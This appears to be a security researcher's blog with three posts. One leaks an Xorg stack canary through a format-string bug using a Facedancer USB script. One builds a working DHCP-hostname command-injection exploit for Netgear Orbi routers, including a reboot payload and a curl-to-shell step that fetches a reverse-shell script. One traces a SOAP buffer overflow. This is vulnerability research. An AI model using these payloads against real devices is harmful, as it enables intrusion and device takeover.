In this case, there were some constraints that made things only slightly harder. The length of each field is limited to 126 characters. This is because a USB string descriptor is at most 255 bytes, the first 2 of which are reserved for the descriptor's length and type fields. The string values are interpreted as UTF-16 as per the USB specification, so the remaining 253 bytes hold at most 126 two-byte characters.

Constraint: Additional %s format strings

The first issue I ran into almost right away when I started testing payloads was that nearly every payload I tried immediately resulted in a SIGSEGV. It wasn’t immediately obvious why this was happening as it’s usually possible to use specifiers like %x to read values without causing a crash (i.e. doesn’t usually lead to OOB read).

Specifically, one of the calls to *sprintf_internal was prepending the format strings I was submitting to another string that contained another 11 %s specifiers, as shown in the GDB output below:

Thread 1 "Xorg" hit Breakpoint 1, __vsnprintf_internal (string=0x7ffce6903d65 "", maxlen=0x3fb, format=0x7ffce69041c0 "event7  - CCCC : is tagged by udev as:%s%s%s%s%s%s%s%s%s%s%s\n", args=0x7ffce69041a8, mode_flags=0x2) at vsnprintf.c:95

This is a problem because each format specifier placed in the controllable strings will consume an argument from the stack and %s format specifiers indicate the argument value will be treated as a char pointer and dereferenced as such; once the arguments for each format spec in the submitted payload were consumed, it became virtually impossible to avoid triggering a segmentation fault caused by a read to an invalid address when the %s specs were reached.

After doing a bit of reading through the man pages for sprintf and some Google searches, I figured out I could use direct parameter access on the format specs in my payload to keep the va_arg pointer fixed. Using parameter access in the format specs does not move the main argument pointer, so in a format string such as %1$x %2$x %x , the first format reads from parameter 1 and the second from parameter 2, but the third reads from parameter 1 again because it’s the first format spec to appear without a parameter specified. The example below shows this in action:

xorg@xuxorg:~$ echo -n "%1\$s%2\$s%3\$s%4\$s" | ./toy
[+] fmt string: '%1$s%2$s%3$s%4$s | %s%s%s%s\n'
[+] args: '1111.', '4444.', '5555.', '6666.'

[+] result:
1111.4444.5555.6666. | 1111.4444.5555.6666.
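The behavior in the toy output above can be modeled in a few lines. This is a toy model of the argument bookkeeping only, not glibc's implementation: the function name and the small set of supported conversions are my own choices, and flags, widths and length modifiers are ignored.

```python
import re

# Matches a literal %% or a conversion such as %s, %x, %3$s or %12$p.
SPEC = re.compile(r"%%|%(?:(\d+)\$)?[sxpdc]")


def consumed_args(fmt):
    """Return the 1-based argument index each conversion in fmt would read."""
    next_sequential = 1  # only specs without an explicit index advance this
    indices = []
    for match in SPEC.finditer(fmt):
        if match.group(0) == "%%":
            continue  # literal percent sign, consumes nothing
        if match.group(1):
            indices.append(int(match.group(1)))
        else:
            indices.append(next_sequential)
            next_sequential += 1
    return indices


if __name__ == "__main__":
    print(consumed_args("%1$s%2$s%3$s%4$s | %s%s%s%s"))
```

Because the indexed specs never advance the sequential pointer, the trailing %s specs start again at argument 1, which is why the appended specifiers end up reading arguments that were already known to be safe to dereference.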

This is how I was able to get around the issues with the extra %s specs, but it cut down the total number of format specifiers I could place in a single field. There were a total of 126 characters that could be used and each plain format spec (without a parameter index) takes up 2 characters, resulting in a total of 63 format specs that could be inserted. The parameter access syntax adds a minimum of 2 characters per format spec. Assuming only single-digit indices are used (4 characters total), this cuts the maximum number of specs that could be included in each field down to 31. This means for each run of the ‘exploit’ we’ll only be able to read a total of 31 values off of the stack.

Those already familiar with format string bugs might assume that, ultimately, this length limit isn’t necessarily an issue since it doesn’t limit how far into the stack we’re able to read. This is because the set of parameter indices can be updated between runs (e.g. run 1 uses indices 1-20, run 2 uses indices 21-40, etc.) to continue reading further into memory. Unfortunately, this is one of the cases where the length limit is very much an issue, as I quickly discovered when I tried to do that.

Constraints: FORTIFY_SOURCE=2

While doing some testing and trying to dump out values I noticed that any time I used parameter access format specs that didn’t include all indices below the max index used (i.e. if a format string accessed parameter 5 without accessing 1-4) the application would crash with a SIGABRT. When investigating this with GDB attached, I noticed this string in the handler that raises the abort signal: "*** invalid %N$ use detected ***\n". A quick Google search later led me to figure out that the Xorg binary I was testing against was compiled with the FORTIFY_SOURCE=2 flag.

a quick detour: tl;dr on FORTIFY_SOURCE=2

I wasn’t familiar with the specific mitigations/checks provided by this flag before this so I spent a bit of time digging into it. I’ll probably spend more time talking about this in a future post so for now here’s the tl;dr version with the most important points:

Compiler-provided security checks and exploit mitigation mechanisms (just like -fstack-protector)
This includes both compile-time and run-time checks
=2 specifically enables format string exploit mitigations; requires compiling with optimization enabled (-O1 or higher)
- %n is not allowed in format strings stored in writeable memory (i.e. don’t allow from user-writeable memory regions)
- Direct parameter access cannot ‘skip’ values; if the 5th parameter is accessed directly, parameters 1-4 must also be accessed somewhere in the format string

That last point is the pertinent one in regard to the issue mentioned at the end of the previous section. This meant that the length limit would effectively create a maximum parameter index that could be accessed while remaining within the boundaries of the constraints and avoiding a crash.

We can calculate the max index like so:

Accessing a single-digit index consumes 4 characters per spec: %N$x
- Accessing arguments 1-9 consumes 36 characters total (9 * 4)
Accessing a double-digit index (10 to 99) consumes 5 characters per spec: %NN$x
- With 90 characters remaining (126 - 36), a maximum of 18 more arguments can be accessed (90 / 5)
Maximum index is 9 + 18 = 27
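The same calculation can be done programmatically, which is handy when trying other conversions or separators. This is a sketch under the constraints stated above (126 usable characters, no skipped indices); the function names are mine.

```python
import re

FIELD_LIMIT = 126  # characters available in one USB string field


def build_contiguous_payload(limit=FIELD_LIMIT, conv="x"):
    """Greedily append %1$x, %2$x, ... while the payload still fits."""
    payload = ""
    index = 0
    while True:
        spec = "%{}${}".format(index + 1, conv)
        if len(payload) + len(spec) > limit:
            return payload, index
        payload += spec
        index += 1


def has_index_gaps(fmt):
    """True if some index below the highest one used is never referenced."""
    used = {int(n) for n in re.findall(r"%(\d+)\$", fmt)}
    return bool(used) and used != set(range(1, max(used) + 1))


if __name__ == "__main__":
    payload, max_index = build_contiguous_payload()
    print(max_index, len(payload), has_index_gaps(payload))
```

With the default limit this fills the field exactly at index 27, matching the manual count. has_index_gaps() only checks the "no skipped indices" rule described above, so it is a quick sanity check before sending a payload that would otherwise abort the target.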

Exploit: Leaking the Canary

Given the constraints described above, the exploit ultimately comes down to a bit of luck — as long as the canary is close enough on the stack to be reachable with the available parameter indices for the vulnerable stack frame, it should be leaked in the log file.

I began with this payload, which only reads up to the 22nd arg so that the .’s between the specs can be included to split things up and make the outputs easy to distinguish.

"%1$p.%2$p.%3$p.%4$p.%5$p.%6$p.%7$p.%8$p.%9$p.%10$p.%11$p.%12$p.%13$p.%14$p.%15$p.%16$p.%17$p.%18$p.%19$p.%20$p.%21$p.%22$p"

Unfortunately, that didn’t work and none of the values in the output matched the pattern of a canary. So, it would come down to the last 5 args. I removed the dots from the first 22 formats to get those characters back and read up to the 25th.

"%1$p%2$p%3$p%4$p%5$p%6$p%7$p%8$p%9$p%10$p%11$p%12$p%13$p%14$p%15$p%16$p%17$p%18$p%19$p%20$p%21$p%22$p.%23$p.%24$p.%25$p"

Luck was on my side. I checked the logs and found what looked a lot like a canary value. As can be seen, the value’s location on the stack changes slightly between different vulnerable function calls. Stack canaries on most Linux distros are 64-bit numbers that end with a null byte. They’re usually not too difficult to find since they don’t look like valid addresses or hex ASCII values (except when they do).

Facedancer Script

Facedancer is the name of another USB hacking board similar to the GreatFET and a Python module that provides USB emulation capabilities for compatible boards. This is incredibly useful for quick prototyping and testing, especially being able to programmatically define how the device will behave in response to different requests sent by the host.

This Facedancer script will trigger the bug and place markers around the locations that are likely to contain the canary value to make it easier to find.

#!/usr/bin/env python3
# pylint: disable=unused-wildcard-import, wildcard-import
import sys
import os
import logging
from facedancer             import devices, main
from facedancer.devices.keyboard import USBKeyboardDevice

prefix = "%1$c%2$c%3$c%4$c%5$c%6$c%7$c%8$c%9$c%10$c%11$c%12$c%13$c%14$c%15$c%16$c%17$c%18$c%19$c%20$c%21$c%22$c"
canary_maybes = "X:%23$p_X:%24$p_X:%25$p" # grep for `X:0x.{14}00`
payload = prefix + canary_maybes

print("[+] reading args from $FSERIAL, $FPRODUCT, and $FMANU env vars")
serial = os.environ.get("FSERIAL", "C"*100)
product = os.environ.get("FPRODUCT", "HYPRODUCT")
manu = os.environ.get("FMANU", payload)

# create the device and connect
DEVICE = USBKeyboardDevice()
DEVICE.serial_number_string = serial
DEVICE.manufacturer_string = manu
DEVICE.product_string = product
DEVICE.product_id = 0x1337
DEVICE.vendor_id = 0x1337
main(DEVICE)

The values can then be searched for in the Xorg log file using grep:

# find it in the logs
grep -a -E "X:0x.{14}00" /var/log/Xorg.0.log
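The same search can be done in Python when the log needs to be post-processed. This is a small sketch that assumes the X: markers produced by the script above; the sample line in the usage section is made up for illustration and is not real output.

```python
import re

# 0x followed by 14 hex digits and a trailing 00: a 64-bit value whose
# lowest byte is zero, which is what a Linux stack canary looks like.
CANARY_RE = re.compile(r"X:(0x[0-9a-fA-F]{14}00)(?![0-9a-fA-F])")


def find_canary_candidates(log_text):
    """Return unique canary-looking values in order of first appearance."""
    seen = []
    for value in CANARY_RE.findall(log_text):
        if value not in seen:
            seen.append(value)
    return seen


if __name__ == "__main__":
    # Made-up sample line; real input would be the Xorg log contents.
    sample = "event7 - X:0x7ffce69041a8_X:0x5d3c9a1be27f4c00_X:(nil)"
    print(find_canary_candidates(sample))
```

The pattern is stricter than the grep version since it only accepts hex digits, which helps weed out matches on unrelated log text.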

The screenshot below shows the canary value in the running Xorg process while attached with GDB and the same value shown in the Xorg log:

This has only been confirmed to work on default installations of Xubuntu 20.04.4 (i.e. before installing any updates, as patches have been pushed). I did test on a Debian 11 system but wasn’t able to get the canary value to leak within the same constraints. Apparently, most distros now enable essentially all exploit mitigations (canaries, RELRO, FORTIFY_SOURCE, etc) on default packages. So, YMMV on different distros or even Ubuntu versions.

Code Exec?

I spent quite a bit of time trying to see whether I could turn this into a code execution bug, but as mentioned above, the FORTIFY_SOURCE=2 checks prevent the use of %n, which really complicates things. The only bypass technique I’ve been able to find is from a 2010 Phrack article, “A Eulogy for Format Strings”, which involves abusing the use of alloca in glibc’s internal vfprintf implementation to shift the stack and cause a 4-byte NULL write at a controllable location. This NULL write is used to overwrite the flag on the open file stream object for stdout which is used to determine whether to enforce the FORTIFY checks. I’m not sure whether that same behavior can be abused in modern glibc versions on 64-bit systems (pretty much everything I’ve found online is on 32-bit systems, and at least 6-7 years old) but I’m still playing around with it. I’ve been able to get some interesting behavior but nothing so far that’s gotten me closer to code exec in any significant way. In any case, I think it may be an area worth exploring, if only to confirm whether some bypass can be achieved on modern systems. If not, I may end up just building a vulnerable version without the fortify checks and writing an exploit for that.

So, for now, no code exec :(.

Reference/Resources

libinput Gitlab Issue #752
Accidental Intrusion, CVE-2022-1215 (blog post by the researcher(s) that reported the bug)
A Eulogy for Format Strings (Phrack 0x43)
Facedancer
Stack Canaries

nday exploit: netgear orbi unauthenticated command injection (CVE-2020-27861)

2022-07-02T00:00:00+00:00

An unauthenticated command injection vulnerability in Netgear Orbi devices was reported to Netgear in December 2020 by ZDI. I wanted to learn more about the bug, but the details of the vulnerability were never released and there were no known exploits. Having spent the last year and a half looking at this system, I decided to try to find the bug myself and see if I could write a functional exploit. It was tougher than I expected, but I made it work in the end :)

introduction

As I’ve mentioned in previous posts, I’ve been hunting for bugs on the Netgear Orbi for about a year and a half. A few weeks ago, I came across an advisory for an unauthenticated command injection vulnerability that was reported to Netgear back in December 2020 and realized that the vulnerable firmware version was the same one that was installed on my device back when I first started looking for bugs on it. In fact, the issue had only been fixed about a month before then. If only I’d started looking just a little bit sooner! Since it was way too late for that, I thought it’d be fun to see if I could find where the vulnerability was located and write a functional exploit to gain full control of the device.

initial analysis

There were no known exploits for this vulnerability at the time I started looking and the only useful information came from the CVE entry on Mitre:

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR Orbi 2.5.1.16 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the UA_Parser utility. A crafted Host Name option in a DHCP request can trigger execution of a system call composed from a user-supplied string. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-11076.

Even though it’s not much, this provided enough information to narrow things down to a specific binary and a specific input path. It would mostly come down to finding the bug and working up from there to trace the input back to the source.

finding the vulnerability

With the info taken from the advisory, I moved on to analyzing the vulnerable version of UA_Parser to try to find where the vulnerability occurred. Since I knew this was command injection, the most likely suspect was insecure use of system() to execute commands. I loaded the binary up in Ghidra and used the symbol table to select system() and then used the Function Call Tree to check the functions that had incoming references to it. While doing this, I came across the following code snippet in one of these functions (annotated for clarity):

This code stood out as a good candidate for command injection given that the argument passed to system() is a string constructed with what looked like user-controlled data. Additionally, the values are placed inside double quotes, which would allow for expansion.

I then took a look at the function I labeled get_host_from_file() at line 78 in the image above and learned that this function eventually reads from a file at /tmp/netscan/attach_device , which contains entries for each client connected to the router, including MAC, IP, and hostname. It parses out the hostname it finds and fills the static buffer hostname which is passed as an argument to get_host_from_file(). This value is eventually passed as the 4th format string arg to snprintf() on line 84, which constructs the string that is passed to system().

At this point I felt pretty confident this was where the vulnerability occurred, but to get additional confirmation I took a look at the version of UA_Parser included with a firmware that was released after this bug was fixed (v2.7.3.22) to compare. The only thing that changed between the two snippets is the double-quotes that surround the user-controlled values were replaced with single-quotes (also known as ‘strong-quotes’), where no expansion/meta-character interpretation occurs:
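The difference between the two quoting styles is easy to reproduce. The sketch below uses a harmless echo as a stand-in for the real command (which I'm not reproducing here) and runs it through sh the same way system() would. Note that shlex.quote() is Python's own helper and is used here only for illustration; it is not what the vendor's patch does.

```python
import shlex
import subprocess


def run_in_shell(command):
    """Run command through sh (as system() does) and return its stdout."""
    result = subprocess.run(["sh", "-c", command], capture_output=True, text=True)
    return result.stdout.strip()


# Harmless stand-in for an attacker-chosen hostname.
hostname = "`echo INJECTED`"

# Double quotes: the shell still performs command substitution inside them.
double_quoted = 'echo "{}"'.format(hostname)

# Single quotes: everything inside is literal. shlex.quote() also escapes
# embedded single quotes, which plain '...' wrapping would not.
single_quoted = "echo {}".format(shlex.quote(hostname))

if __name__ == "__main__":
    print(run_in_shell(double_quoted))  # the substitution ran
    print(run_in_shell(single_quoted))  # the hostname is printed verbatim
```

Wrapping a value in plain single quotes is only safe as long as the value itself can't contain a single quote, so a quoting helper (or avoiding the shell entirely) is the more robust choice in new code.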

tracing the data from sink → source

The next thing I needed to figure out was how the hostname value eventually reached this code. As mentioned above, UA_Parser reads the hostname value from the file /tmp/netscan/attach_device. I didn’t find any other references to this file in UA_Parser that indicated it writing to the file, so I used grep to recursively search the root filesystem I had extracted from the firmware image to find other files that referenced it. This is when I came across the binary /usr/sbin/net-scan which seemed like a good lead given the name.

After spending some time going through the code in Ghidra, I eventually found the function used to write /tmp/netscan/attach_device which I labeled update_attach_devices(). There was only a single reference to this function, which occurred within another function that appeared to be the main entrypoint to trigger a ‘device scan’; this function is also only referenced once (from main()):

Naturally, my next question was about where/how net-scan was getting the values it used to populate the attached devices file. I spent some more time looking through the decompiled code and eventually came across a function that opened a file at /tmp/dhcpd_hostlist for reading. This caught my attention because the advisory for the vulnerability mentioned that a “crafted Host Name option in a DHCP request can trigger execution of a system call”, so it made sense that net-scan would get its values from whatever the DHCP server had received.

Another recursive grep later, I had confirmed that the DHCP server binaries (/sbin/udhcpd and /sbin/udhcpd-ext) contained references to /tmp/dhcpd_hostlist. Since the source code for udhcp is included in the GPL sources for the device provided by the vendor, I took a look there and found the string in leases.h as a constant called HOSTNAME_SHOWFILE. This value is used in some custom code in a function called show_clients_hostname() in dhcpd.c (shown below at line 111) which writes the MAC/IP and hostname for each lease in the global leases structure to this file.

Below is a snippet of code from sendACK() in serverpacket.c, one of two locations where show_clients_hostname() is called. One detail that became really important later is the call to toupper() on line 535: it’s called for each character in the hostname string before the hostname is saved to the lease object. This causes all alphabetic letters to be uppercased in the value that’s written out to /tmp/dhcpd_hostlist and eventually ends up in the vulnerable call to system().

summary of the analysis

the vulnerability occurs in UA_Parser due to a call to system() using a string containing an attacker-controlled hostname value
UA_Parser reads the hostname value from /tmp/netscan/attach_device
UA_Parser is executed by a binary called net-scan used to detect attached devices
net-scan creates the file /tmp/netscan/attach_device
net-scan reads the hostname values from the file /tmp/dhcpd_hostlist
/tmp/dhcpd_hostlist is created by udhcpd using the hostnames saved in its global leases array
udhcpd populates the hostname field for each lease struct in the global array using values received in DHCP REQUEST packets

testing setup

debugging

I created the following GDB script to set breakpoints on main() and system() when I attached to UA_Parser , as well as set the fork-mode settings to be sure the debugger follows the processes as they spawn.

set breakpoint pending on
set follow-fork-mode child
break main
commands 1
set follow-fork-mode parent
continue
end

break system
commands 2
info args
backtrace full
info frame
info registers
x/s $r0
x/s $r1
x/s $r2
continue
end

net-scan runs periodically in the background on the device but a re-scan can also be manually triggered by loading the “Attached Devices” page in the web admin UI. This is what I used during testing to force it to run the vulnerable code. Interestingly, I later discovered it would run even with unauthenticated requests to the homepage, so an attacker would actually be able to trigger the vulnerable code on-demand.

Below is a screenshot of the GDB script breaking on system() while attached to the UA_Parser process and triggering the vulnerable code. The argument that was passed to system() can be seen near the bottom of the register listing (the call to ‘devices_info update …’).

payload delivery

In order to send custom DHCP hostname values easily and establish DHCP connections, I used udhcpc, which allows for passing in a custom hostname at the command line. I used this command after connecting to the Orbi using a static IP and confirmed the payload appeared in the relevant files.

sudo ./udhcpc -H "\$PATH" -f -i  -n

With everything set up to be able to deliver payloads, it was time to start building one.

crafting payloads

using parameter+substring expansion to build a payload

As mentioned earlier in this post, each character in the hostname value that udhcpd receives from clients is uppercased before it’s saved to the global leases array and eventually written to /tmp/dhcpd_hostlist. This means that by the time UA_Parser reads these values from /tmp/netscan/attach_device, a payload like $(reboot) would be transformed to $(REBOOT). Linux and native Linux file systems are case-sensitive, which means any such payload would fail to execute the desired program. So, I needed to find a way to call binaries using only uppercase letters, symbols, and numbers.

My first thought was I would likely need to use shell expansion and environment variables since they typically use uppercase names. I did a bit of Googling and came across this page about bash parameter expansion, which seemed like a viable way to construct a working payload. Specifically, I thought substring expansion could be used to slice up pieces of environment variables to grab the characters needed to build a payload. With this in mind, I checked what environment variables were available in the shell for root (the UA_Parser process runs as root) and quickly realized I would have to get pretty creative given what was there.

I played around with different patterns in the shell while connected via serial and eventually found one that made use of both parameter and filepath expansion which would expand out to /sbin/reboot, built up from characters sliced from the $PATH env variable:

${PATH:4:5}/${PATH:3:1}?????

In this context, the ? symbol matches exactly one character. The expansion works because reboot is the only binary in /sbin that starts with r followed by exactly 5 characters. The screenshot below shows the final payload constructed piece by piece.
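For anyone who wants to check the offsets without a shell handy, the two expansion steps can be mimicked in Python. This is a sketch: the PATH value is the one listed in this post's constraint recap, substring() is my own helper standing in for the shell's substring expansion, and the /sbin listing is hypothetical and only there to illustrate the glob step.

```python
import fnmatch

PATH = "/usr/sbin:/usr/bin:/sbin:/bin"  # root's PATH on the device, per this post


def substring(value, offset, length):
    """Equivalent of the shell's ${value:offset:length}."""
    return value[offset:offset + length]


# ${PATH:4:5}/${PATH:3:1}????? after parameter expansion, before globbing
pattern = substring(PATH, 4, 5) + "/" + substring(PATH, 3, 1) + "?????"

# Hypothetical /sbin listing used only to illustrate pathname expansion.
sbin = ["/sbin/reboot", "/sbin/route", "/sbin/ifconfig", "/sbin/udhcpd"]
matches = [p for p in sbin if fnmatch.fnmatchcase(p, pattern)]

if __name__ == "__main__":
    print(pattern)
    print(matches)
```

The parameter expansion yields the pattern /sbin/r????? and the glob then narrows it to the one six-letter name starting with r. If more than one file matched, the shell would expand to several words and the first would be run with the rest as arguments, so uniqueness matters.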

The final step was to place this payload within a shell context using command substitution so that once the string expanded out it would be interpreted as a command. To do this I wrapped the payload inside $() syntax and set everything up to do a test run. After getting a DHCP lease with the crafted request and attaching to the running UA_Parser process, I loaded the Attached Devices page in the web UI and caused net-scan to run. Easy peasy, right?

Yeah, right. It’s never that easy.

more constraints: html encoding

The screenshot below shows the debugger output when catching the vulnerable call to system() with the payload above.

This is when I discovered there was some filtering happening and certain characters are HTML encoded. Specifically, the parentheses characters are encoded in the payload above. I went back through the code for net-scan and found the function responsible for the encoding. The full list of encoded characters is:

< > ( ) & ' " \

I also learned that net-scan truncates the hostname string read from the DHCP host list at 32 characters before writing it to /tmp/netscan/attach_device.

Pretty rough! Almost every useful character (in regards to shell manipulation) is encoded and there’s a pretty tight length limit, which only makes writing a functional exploit that much more difficult. But, first I had to get code execution, so I pushed on.

success: backquote command substitution

There was really only one other option left to get command execution considering parentheses were filtered, and that was to use the older backquote form of substitution:

`${PATH:4:5}/${PATH:3:1}?????`

I did the usual dance to connect and send a DHCP request while attached to the UA_Parser process with GDB. After triggering net-scan again, I caught the call to system() and saw that a new chain of calls had occurred and reboot had been called. The device then began to reboot!

And there it is, a working proof-of-concept showing the bug could be exploited…

escaping constraints: arbitrary code execution

Okay, but rebooting the device isn’t particularly cool. Now it was time to think about what could actually be done with the bug.

To recap, the constraints for the payload are:

32 character length limit
All letters get uppercased
Filtered chars: < > ( ) & ' " \
Must build payload from chars in env variables + file/parameter expansion:
- PATH=/usr/sbin:/usr/bin:/sbin:/bin
- HOME=/tmp
- HOSTNAME=RBR20
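Since so many candidate payloads fail on one of these rules, a tiny checker saves a lot of round trips to the device. This is a sketch of the constraints as listed above; the function name is mine, and it only validates the string itself (it does not model which step in the chain applies each transformation or in what order).

```python
MAX_LEN = 32
ENCODED_CHARS = set("<>()&'\"\\")


def payload_problems(payload):
    """Return a list of reasons the payload would not survive intact."""
    problems = []
    if len(payload) > MAX_LEN:
        problems.append("too long by {} chars".format(len(payload) - MAX_LEN))
    if payload != payload.upper():
        problems.append("contains lowercase letters that will be uppercased")
    bad = sorted(set(payload) & ENCODED_CHARS)
    if bad:
        problems.append("contains encoded chars: " + " ".join(bad))
    return problems


if __name__ == "__main__":
    for candidate in ["$(reboot)", "`${PATH:4:5}/${PATH:3:1}?????`"]:
        print(candidate, "->", payload_problems(candidate) or "ok")
```

The backquote reboot payload passes with two characters to spare, while $(reboot) fails on both the case and the parentheses rules.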

The length limit was probably the most frustrating part of this whole thing when combined with the uppercasing issue — it could easily take 7-9 characters to do the expansion needed to grab a single character for the final payload, so using up those 32 characters was very easy. The inability to use > or < also meant using redirection to overwrite files wasn’t an option.

With all of this in mind, I narrowed down the possible attack scenarios to the following:

Leak admin credentials back to the attacker somehow
Reset the admin password
Download and execute a script to run arbitrary commands without dealing with constraints

I spent a couple of days experimenting with what felt like hundreds of payloads and possible angles to achieve one of the results above. Again, that length limit SUCKED — on multiple occasions I had figured out working payloads that ended up exceeding the limit by 1-2 characters and immediately became useless. At the end of each session I would tell myself I would give up and that it just wasn’t possible to do anything useful given the restrictions. Then the next day when I signed back on I would get sucked back in, convinced there just had to be a way.

going after curl

After tons of failed attempts, I eventually came to a conclusion: in order to do anything useful, I would need to find a way to break out of / get around the length limit. Having determined this, I knew the only feasible way forward would be to find a way to download a script from a remote source and run it, which would avoid the uppercasing issues, length limits, etc. With this in mind, I shifted my focus to figuring out a way to use the curl or wget binaries on the router to achieve this.

This finally paid off after another couple of hacking sessions when I figured out the following payload:

The first part makes use of expansion to match /usr/bin/curl, which is used to make a request to a server (hy.me in this example), and pipes the contents of the response to a shell (pointed to by $0).

In order to test this and show it working without having to actually go out and buy a two character domain (which apparently go for anywhere between $500 - $15k), I edited /etc/hosts on the device to add a record pointing hy.me to my ‘evil’ server where I was running a Python web server that would respond with the contents of a shell script to requests for the root path (to use as few characters as possible).
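
For reference, a server like the one described above can be sketched with Python's standard library. This is not the exact webapp from the screenshot: the handler name, the placeholder script body, and the `start_server` helper are all made up for illustration.

```python
import http.server
import threading

# Placeholder script body; what the script actually does is up to the tester.
SCRIPT = b"#!/bin/sh\necho hello from the test server\n"


class ScriptHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        # Serve the same script for every path so the URL can stay short.
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(SCRIPT)))
        self.end_headers()
        self.wfile.write(SCRIPT)

    def log_message(self, fmt, *args):
        # Print one line per request so incoming requests are visible.
        print("request from %s: %s" % (self.client_address[0], fmt % args))


def start_server(host="127.0.0.1", port=0):
    """Start the server in a background thread; port=0 picks a free port."""
    server = http.server.HTTPServer((host, port), ScriptHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

Binding to an address the router can reach and to port 80 would be needed for a real test; the defaults here keep the sketch local.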

The screenshot below shows everything in action, going counter-clockwise starting at the top-left:

the udhcpc process that sent the payload
the code for the Python webapp that returns code to spawn a reverse shell
the running webapp showing requests were received from the Orbi
(open telnet session, unrelated)
the netcat listener receiving the connection from reverse shell

conclusion

There it is: there’s now an exploit for CVE-2020-27861 and it can be used to completely take over a vulnerable Orbi device. In total, it took about a week to go from initial analysis to finally getting arbitrary code execution, with most of the time being spent on figuring out how to create a payload to actually do something useful given the restrictions. It was pretty fun and I was able to pick up some new techniques for dealing with payload constraints for command execution.

The most important lesson learned? Persistence pays off (usually). I really didn’t think a full exploit would be possible and almost gave up before getting full system control, but I’m glad I kept pushing. I’ll probably start spending more time doing this kind of n-day research and monitoring advisories for specific devices/applications to hopefully be able to do this for a more recent vuln.


orbi hunting 0x1: crashes in soap-api

2022-06-19T00:00:00+00:00

The second part in this series going over my time hunting for bugs on the Netgear Orbi. This post is a walkthrough of a long journey that began with the discovery of a buffer overflow which I initially thought was unreachable due to a separate null pointer dereference, continued with eventually finding a way to get past that null deref, and ended with me being thwarted by a stack canary that couldn’t be easily bypassed (at least, not by me). So, free 0day for anyone that can exploit it? Hit me up on twitter to let me know how you did it.

introduction

The Orbi provides a SOAP server which seems to primarily be used by the Netgear mobile application, reachable at http:///soap/server_sa. I had originally discovered this endpoint early on when I started looking at this router, but it wasn’t until I had connected over serial that I realized it was incredibly easy to crash the binary that handles SOAP requests, /usr/sbin/soap-api. In fact, almost every request I sent to this endpoint caused a stack trace to be printed to the console. This seemed like a good enough place to start, so I decided to figure out exactly what caused these crashes and whether any of it was exploitable.

Note: I chose to write about this issue and not report it to Netgear since merely crashing the soap-api process does very little and doesn’t even really work as a denial-of-service mechanism because a new process is spawned on each request. As far as I can tell there’s no security impact here.

background

The SOAP server parses the HTTP header SOAPAction on incoming requests to determine which SOAP action/method the user wants to trigger. The request is initially handled by lighttpd, where mod_cgi handles initial processing and passes it onto soap-api. The server sets environment variables that describe the request, which soap-api then reads from in order to handle it.

The format of the SOAPAction header is:



crash discovery

While doing some manual testing after starting with a known-good SOAPAction header value, I found that the server would send the following response when submitting a METHOD_str part that is 248 characters or longer, while simultaneously causing a crash dump to be printed to the console.

HTTP/1.1 200 OK
Content-Length: 763
Content-Type: text/xml; charset="UTF-8"
Server: Linux/2.6.15 uhttpd/1.0.0 soap/1.0
Connection: close
Date: Fri, 25 Jun 2021 14:09:01 GMT








SOAP Len:0 Action:x Method:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgd = d7854000
[00000000] *pgd=00000000

CPU: 3 PID: 26769 Comm: soap-api Tainted: P             3.14.77 #1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtask: dce74380 ti: d6014000 task.ti: d6014000
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPC is at 0xb6b52db4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALR is at 0xb6b4ee88
AAAAAAAAAAAAAAAAAAA IP:10.13.13.211

pc : []    lr : []    psr: 60000010
sp : befff398  ip : 7f5fce58  fp : 7f6026fc
r10: befff424  r9 : befff44c  r8 : befff48c
r7 : befff54c  r6 : befff400  r5 : 7f5d4594  r4 : 00000000
r3 : 00000000  r2 : 00000001  r1 : 00000000  r0 : 00000000
Flags: nZCv  IRQs on  FIQs on  Mode USER_32  ISA ARM  Segment user
Control: 10c5387d  Table: 9785406a  DAC: 00000015
CPU: 3 PID: 26769 Comm: soap-api Tainted: P             3.14.77 #1
[] (unwind_backtrace) from [] (show_stack+0x10/0x14)
[] (show_stack) from [] (dump_stack+0x78/0x98)
[] (dump_stack) from [] (__do_user_fault+0x74/0xbc)
[] (__do_user_fault) from [] (do_page_fault+0x2f0/0x370)
[] (do_page_fault) from [] (do_DataAbort+0x34/0x98)
[] (do_DataAbort) from [] (__dabt_usr+0x34/0x40)
Exception stack(0xd6015fb0 to 0xd6015ff8)
5fa0:                                     00000000 00000000 00000001 00000000
5fc0: 00000000 7f5d4594 befff400 befff54c befff48c befff44c befff424 7f6026fc
5fe0: 7f5fce58 befff398 b6b4ee88 b6b52db4 60000010 ffffffff


Unfortunately, it was nearly impossible to identify where the crash was actually happening from the crash dump alone, as the stack trace only shows the top of the call stack, containing the chain of calls in the kernel that handled the fault. Since the stack trace was no help, I figured the next step was to load soap-api up in Ghidra, find where the SOAPAction header was being parsed, and trace it through the application, looking for places where it could overflow a buffer.

first find: buffer overflow in SendSoapResponse()

After digging through functions in the binary for a while and looking for strings that looked familiar/related to the output I was getting from the server, I found the following piece of code in the function at 0x0003e82c. From looking at the non-stripped versions of this binary, I was able to identify this function as SendSoapResponse. This function is responsible for constructing the HTTP response, including the response headers, sent to the client.



The overflow occurs on line 48 in the decompiled code shown above as a result of the call to sscanf(). This line parses the SOAP method section from the server response content and writes it to the buffer auStack236, a fixed-size 64-byte stack buffer, without any length checks. At this point I felt pretty confident this was the crash I was seeing in the stack traces, so next I wanted to understand what paths led to this code being executed.


After reading through the code some more I realized almost every request eventually led to  SendSoapResponse() (I mean, duh, right?). In general, the flow always goes a little something like this:


  main()
    
      takes care of getting the SOAPAction header from an environment variable SOAP_ACTION or HTTP_SOAPACTION (set by the parent HTTP server (lighttpd) or the CGI handler (modcgi, procgi))
      handles parsing of the SOAP action and SOAP method parts from the header
      saves pointers to the start of each section in the buffer/PTR returned by getenv()
      these ptrs are passed to SoapExecute()
    
  
  SoapExecute()
    
